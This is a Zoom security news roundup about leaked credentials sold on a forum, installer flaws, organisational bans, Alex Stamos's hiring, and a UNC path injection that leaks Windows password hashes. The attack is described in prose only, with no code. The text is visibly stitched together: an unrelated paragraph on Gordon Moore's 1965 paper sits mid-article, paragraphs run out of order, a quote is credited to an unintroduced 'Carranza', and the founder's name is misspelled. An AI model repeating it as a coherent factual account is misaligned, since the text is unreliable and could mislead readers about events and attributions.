Security News

Researchers have found a database of Zoom video conferencing credentials ranging from just an email and password to also include meeting IDs, names and host keys. The latter is possible because Zoom users are remarkably lax about protecting the details - and of course it could be just a small subset of a larger collection of credentials not made available to others.

Researchers have uncovered a database shared on an underground forum containing more than 2,300 compromised Zoom credentials. Etay Maor, chief security officer at IntSights, told Threatpost that the source of the credentials is unknown, but the smaller number of them suggests they didn't come from a Zoom database breach.

That spike in users also exposed a growing list of security flaws: Zoom bombing trolls have emerged, user email addresses and photos have leaked, calls aren't being end-to-end encrypted, and flaws found in the Zoom installer allow an attacker to gain root access to computers that run a malicious version of it. These security flaws have prompted some organizations, companies, governments, government agencies, and schools to ban Zoom or restrict its use.

As it faces a major lawsuit, Zoom is taking a significant step to bolster security and privacy efforts by recruiting an industry heavy-hitter - former Facebook CISO Alex Stamos - to provide special counsel. Zoom now says that it aims to clean up its issues from both the product side and by taking a high-level executive approach, Zoom founder Eric Yaun said in a blog post published Wednesday.

Zoom has promised to improve security and privacy, but an increasing number of organizations have decided to ban the video conferencing application over security concerns. Stamos will help Zoom implement better security controls and practices.

In 1965, Gordon Moore published a short informal paper, Cramming more components onto integrated circuits. Based on not much more but these few data points and his knowledge of silicon chip development - he was head of R&D at Fairchild Semiconductors, the company that was to seed Silicon Valley - he said that for the next decade, component counts by area could double every year.

In an unprecedented and hotly debated move, the New York City Department of Education banned the use of Zoom, writing in an internal memo on April 3 that teachers were no longer allowed to use the platform at all. "We know the transition away from Zoom will take time for many educators and we will support them. We know maintaining continuity of teaching means it won't happen overnight. Less than 2 weeks ago, our heroic educators began transforming instruction for 1.1M kids, bringing the nation's largest public school system online. They rose to this challenge with grace, and our whole city is grateful for how they've learned to teach and lead remotely," Carranza wrote.

Tim Keeler, CEO of Remediant, a security consultant and penetration tester, explained how Zoom became a target. The Windows version of Zoom "Tricked users into disclosing usernames and password hashes by clicking on links in a Zoom session chat window," which "Took advantage of the Universal Naming Convention path injection vulnerability in the Zoom Windows client."

Such attacks are possible because Zoom for Windows supports remote UNC paths that convert potentially insecure URIs into hyperlinks when received via chat messages to a recipient in a personal or group chat. Hacking Zoom to Steal Windows Passwords Remotely Confirmed by researcher Matthew Hickey and demonstrated by Mohamed Baset, the first attack scenario involves the SMBRelay technique that exploits the fact that Windows automatically exposes a user's login username and NTLM password hashes to a remote SMB server when attempting to connect and download a file hosted on it.

Over the past few weeks, the use of Zoom video conferencing software has exploded ever since it emerged the platform of choice to host everything from cabinet meetings to yoga classes amidst the ongoing coronavirus outbreak and work from home became the new normal. Zoom came under the lens for its "Attendee tracking" feature, which, when enabled, lets a host check if participants are clicking away from the main Zoom window during a call.